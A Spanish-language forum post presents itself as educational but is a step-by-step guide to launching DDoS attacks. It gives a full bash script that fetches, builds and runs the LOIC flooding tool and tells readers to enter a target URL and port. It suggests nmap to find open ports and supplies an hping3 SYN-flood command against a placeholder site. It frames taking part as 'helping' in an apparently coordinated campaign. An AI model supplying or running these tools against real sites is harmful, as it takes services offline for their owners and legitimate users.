SCRIPT en bash para "jugar" con Ddos en linux
Texto e info a modo educativo
dijo:
¿que es DDOS? segun wikipedia
En seguridad informática, un ataque de denegación de servicio, también llamado ataque DoS (de las siglas en inglés Denial of Service), es un ataque a un sistema de computadoras o red que causa que un servicio o recurso sea inaccesible a los usuarios legítimos. Normalmente provoca la pérdida de la conectividad de la red por el consumo del ancho de banda de la red de la víctima o sobrecarga de los recursos computacionales del sistema de la víctima.
Se genera mediante la saturación de los puertos con flujo de información, haciendo que el servidor se sobrecargue y no pueda seguir prestando servicios, por eso se le dice "denegación", pues hace que el servidor no dé abasto a la cantidad de usuarios. Esta técnica es usada por los llamados hackers para dejar fuera de servicio a servidores objetivo
En sintesis un ej:
si el "agua" son paquetes enviados, "el vaso" es el server o servidor, podemos decir que un ataque ddos es derramar agua hasta que desborde el vaso xD
vamos a lo practico xD
Existe un Script para distribuciones como Debian y Ubuntu, este Script lo que hace es instalar una aplicación que se llama LOIC (Low Orbit Ion Cannon).
Se puede hacer pruebas de ataque, incluso ya podrías estar participando a través de una red de botnet, maquinas controladas para realizar ataques masivos DDoS. Como sabemos esto es algo inseguro y claro sera mejor que lo hagas por ti mismo, acá unas soluciones.
copiar el siquiente script bash:
dijo:
#!/bin/bash
# Copyfuck © 2010 q
#
# This script installs, updates and runs LOIC on Linux.
#
# Supported distributions:
# * Ubuntu / Debian
# * Fedora
#
# Usage: bash install_loic.bash
###COLOURS###
txt_bld=$(tput bold)
bld_red=${txt_bld}$(tput setaf 1)
col_rst=$(tput sgr0)
###GLOBALS###
GIT_REPO=https://github.com/NewEraCracker/LOIC.git
GIT_BRANCH=master
###FUNCTIONS###
ensure_git() #Checks if git is installed, Tries to install it if not
{
type -P git &>/dev/null ||
{
echo -e "${bld_red}Git not found! Attempting to install...${col_rst}"
if [ -f /etc/lsb-release ] ; then
sudo apt-get install git
elif [ -f /etc/fedora-release ] ; then
sudo yum install git
elif [ -f /etc/debian_version ] ; then
sudo apt-get install git
fi
}
}
is_loic_git()
{
[[ -d .git ]] && grep -q LOIC .git/config
}
is_loic() {
is_loic_git ||
{
[[ -d LOIC ]] && cd LOIC && is_loic_git
}
}
get_loic() {
ensure_git
if ! is_loic ; then
git init
git clone $GIT_REPO -b $GIT_BRANCH
fi
}
compile_loic() {
get_loic
if ! is_loic ; then
echo -e "${bld_red}Error: You are not in a LOIC repository.${col_rst}"
exit 1
else
if [ -f /etc/lsb-release ] ; then
echo -e "${bld_red}monodevelop and liblog4net-cil-dev not found! Attempting to install...${col_rst}"
sudo apt-get install monodevelop liblog4net-cil-dev
elif [ -f /etc/fedora-release ] ; then
echo -e "${bld_red}mono-basic, mono-devel, monodevelop and mono-tools not found! Attempting to install...${col_rst}"
sudo yum install mono-basic mono-devel monodevelop mono-tools
elif [ -f /etc/debian_version ] ; then
echo -e "${bld_red}monodevelop and liblog4net-cil-dev not found! Attempting to install...${col_rst}"
sudo apt-get install monodevelop liblog4net-cil-dev
fi
fi
mdtool build
}
run_loic() {
is_loic
if [[ ! -e bin/Debug/LOIC.exe ]] ; then
compile_loic
fi
type -P mono &>/dev/null ||
{
echo -e "${bld_red}mono-runtime not found! Attempting to install...${col_rst}"
if [ -f /etc/lsb-release ] ; then
sudo apt-get install mono-runtime
elif [ -f /etc/fedora-release ] ; then
sudo yum install mono-runtime
elif [ -f /etc/debian_version ] ; then
sudo apt-get install mono-runtime
fi
}
mono bin/Debug/LOIC.exe
}
update_loic() {
ensure_git
if is_loic ; then
git pull --rebase
compile_loic
else
echo -e "${bld_red}Error: You are not in a LOIC repository.${col_rst}"
fi
}
case $1 in
install)
compile_loic
;;
update)
update_loic
;;
run)
run_loic
;;
*)
echo "Usage: $0 "
;;
esac
Como el anterior código es lenguaje bash, para hacerlo funcionar deberemos copiarlo a un procesador de texto por ejemplo Gedit, para después guardarlo con la extensión .sh.
Ya que tenemos el archivo, ahora abrimos una terminal[Aplicaciones > Accesorios > Terminal]y según en la ruta que se encuentre nuestro archivo, le damos permisos para poder ejecutarlo con el siguiente comando:
sudo chmod a+x ./nombredelarchivo.sh
E instalamos con la siguiente orden:
./nombredelarchivo.sh install
Por ultimo ejecutamos el programa desde terminal:
./nombredelarchivo.sh run
Estas son hasta ahora sólo algunas de las formas en las que podemos ayudar, conforme pueda iré agregando otras, también para Sistemas Windows y Mac OSx ya que esto es mundial y no nos distinguimos por si usamos Mac o PC, Linux o Windows.
Lo que lo que hay que tener en cuenta es el puerto(port) ademas modo tcp, http y udp y en la dirección(URL)pones el target al que se ataca, en este momento es paginaweb.com para eso pueden usar nmap para ver el puerto activo
pero recuerden que
dijo:
Nmap es ilegal en ciertos paises,pero nuestro fin es solo educativo
- No te gusta meterte en temas técnicos de configurar o instalar algún programa tienes varias opciones:
YAPA
ACA OTRA FORMA
Algunos usuarios de Linux comentan que tienen problemas al instalar el script, el cual funciona perfectamente ya que yo mismo lo he probado, por lo general estos problemas son a causa de configuraciones extrañas u omitir pasos, etc.
Para facilitar el proceso de Ataque DDoS pueden usar este comando en terminal(hay probabilidades de que pida el paquete hping3, es necesario instalar) para hacer un ping sin limite de tiempo a algún host:
sudo hping3 -i u15000 -S -p 443 www.aquielnombredesitio.com
Lo que lo que hay que tener en cuenta es el puerto(-p) y en la dirección(URL)pones el target al que se ataca, en este momento es paginaweb.com para eso pueden usar nmap para ver el puerto activo
pero recuerden que
dijo:
Nmap es ilegal en ciertos paises,pero nuestro fin es solo educativo
Si no podes correr el programa, te aconsejo de una forma mas fácil hacerle un ping al servidor para saturarlo, también es Ataque DDoS .
dijo:
sudo hping3 -i u15000 -S -p 443 http://www.aquielnombredesitio.com
fuente
tambien disponible en :
ahhh vale comentar
y dejar puntos
por ahora 11 favoritos 168 entradas y 4 comentario